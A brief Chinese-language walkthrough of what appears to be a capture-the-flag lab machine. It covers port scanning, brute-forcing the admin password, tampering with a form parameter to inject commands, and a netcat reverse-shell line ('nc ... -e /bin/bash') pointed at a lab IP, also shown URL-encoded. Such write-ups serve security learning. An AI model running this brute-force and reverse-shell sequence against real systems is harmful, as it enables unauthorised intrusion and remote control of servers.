nmap扫描,扫描出80端口和ssh端口
先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看
那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可
爆破得到admin:happy
登录
继续执行命令抓包
修改radio的值
使用nc
nc 192.168.160.129 777 -e /bin/bash
改成nc+192.168.160.129+777+-e+/bin/bash